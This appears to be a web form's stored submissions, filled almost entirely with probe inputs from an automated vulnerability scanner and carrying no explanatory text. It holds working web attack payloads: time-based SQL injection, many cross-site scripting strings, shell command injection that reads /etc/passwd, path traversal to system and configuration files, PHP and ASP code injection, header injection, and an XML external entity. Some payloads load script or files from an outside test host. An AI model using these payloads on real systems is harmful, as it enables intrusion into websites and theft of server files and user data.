Mr.

1

Mr.' and sleep(4)='

1

Mr.' and (sleep(4)+1) limit 1 --

1

Mr." and sleep(4)="

1

Mr.' or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr.'=sleep(4)='

1

Mr."=sleep(4)="

1

Mr.'+(select 1 from (select sleep(4))A)+'

1

Mr. and sleep(4)

1

Mr. or (sleep(4)+1) limit 1 --

1

Mr.';select pg_sleep(4); --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:0' --

1

Mr.'; waitfor delay '0:0:2' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr.'"()&%<ScRiPt >prompt(902658)</ScRiPt>

1

Mr.'"()&%<ScRiPt >prompt(902658)</ScRiPt>

1

Mr._917612

1

acu10214<s1﹥s2ʺs3ʹuca10214

1

acux3104z1z2abcxuca3104

1

acux3104z1z2abcxuca3104

1

Mr.<ScRiPt >prompt(967405)</ScRiPt>

1

Mr.<script>prompt(905857)</script>

1

Mr.<ScRiPt >prompt(950501)</ScRiPt>

1

Mr.

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998702></ScRiPt>

1

Mr.

1'"

Mr.<ScRiPt >prompt(973627)</ScRiPt>

1

Mr.

\

Mr.<video><source onerror="javascript:prompt(914986)">

1

Mr.

1xa7

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959962)"></g></svg>

1

Mr.<div style=width:expression(prompt(931805))>

1

Mr.

@@0KQhj

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='914524'>

1

Mr.

JyI=

Mr.<body onload=prompt(955467)>

1

Mr.

'"

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943211)>

1

Mr.

''""

Mr.<img src=xyz OnErRor=prompt(900661)>

1

Mr.<img/src=">" onerror=alert(947833)>

1

Mr.%3CScRiPt%20%3Eprompt(907768)%3C/sCripT%3E

1

<img acu onmouseover=prompt(919500) //>

1

Mr.<input autofocus onfocus=prompt(946360)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._ibIKd <ScRiPt >prompt(930005)</ScRiPt>

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

Mr.

1

'|'ld

1

1'"

1

"|"ld

1

;cat /etc/passwd;

1

\

1

1xa7

1

';cat /etc/passwd;'

1

@@wgYgN

1

";cat /etc/passwd;"

1

JyI=

1

||cat /etc/passwd

1

&dir

1

'"

1

'&dir&'

1

''""

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9395385*9004706)

Mr.

'+response.write(9395385*9004706)+'

Mr.

"+response.write(9395385*9004706)+"

Mr.

${100237+99585}

Mr.

1

Mr.

1

response.write(9670486*9100708)

1

'+response.write(9670486*9100708)+'

1

Mr.

1

"+response.write(9670486*9100708)+"

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

${99186+99959}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

1

Mr.

!(()&&!|*|*|

'"()

1

Mr.

^(#$!@#$)(()))******

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

Mr.

1

Mr.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

Mr.

1

Mr.

1

Mr.

1

Mr.

1

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

Mr.

1

${@print(md5(acunetix_wvs_security_test))}

1

Mr.

1

Mr.

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

Mr.

1

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

http://www.acunetix.tst

1

Mr.

1

Mr.

1

Mr.

'"

Mr.

<!--

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(999657)</ScRiPt>

Mr.

1_974708

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.' and sleep(4)='

1

Mr.' and sleep(4)='

1

Mr.' and sleep(0)='

1

Mr.' and sleep(2)='

1

Mr.

1

Mr.' and (sleep(4)+1) limit 1 --

1

Mr." and sleep(4)="

1

Mr.' or (sleep(4)+1) limit 1 --

1

Mr.

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(4)+1) limit 1 --

1

Mr." or (sleep(0)+1) limit 1 --

1

Mr." or (sleep(2)+1) limit 1 --

1

Mr.'=sleep(4)='

1

Mr."=sleep(4)="

1

Mr.'+(select 1 from (select sleep(4))A)+'

1

Mr. and sleep(4)

1

Mr. or (sleep(4)+1) limit 1 --

1

Mr.';select pg_sleep(4); --

1

Mr.';select pg_sleep(4); --

1

Mr.';select pg_sleep(4); --

1

Mr.';select pg_sleep(0); --

1

Mr.';select pg_sleep(0); --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:4' --

1

Mr.'; waitfor delay '0:0:0' --

1

Mr.'; waitfor delay '0:0:2' --

1

Mr.'; waitfor delay '0:0:2' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr."; waitfor delay '0:0:4' --

1

Mr."; waitfor delay '0:0:0' --

1

Mr."; waitfor delay '0:0:2' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@OBKTq

Mr.

JyI=

Mr.

'"

Mr.'"()&%<ScRiPt >prompt(928458)</ScRiPt>

1

Mr.

''""

Mr._932951

1

acu10618<s1﹥s2ʺs3ʹuca10618

1

acux1595z1z2abcxuca1595

1

Mr.<ScRiPt >prompt(977973)</ScRiPt>

1

Mr.<script>prompt(990276)</script>

1

Mr.<ScRiPt >prompt(947735)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900851></ScRiPt>

1

Mr.<ScRiPt >prompt(905735)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(954428)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943961)"></g></svg>

1

Mr.<div style=width:expression(prompt(908984))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='974410'>

1

Mr.<body onload=prompt(911753)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939127)>

1

Mr.<img src=xyz OnErRor=prompt(911411)>

1

Mr.<img/src=">" onerror=alert(987017)>

1

Mr.%3CScRiPt%20%3Eprompt(997957)%3C/sCripT%3E

1

<img acu onmouseover=prompt(998832) //>

1

Mr.<input autofocus onfocus=prompt(969107)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._90Ui1 <ScRiPt >prompt(904661)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@UkQh7

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

JyI=

1

cat /etc/passwd

1

'"

1

''""

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

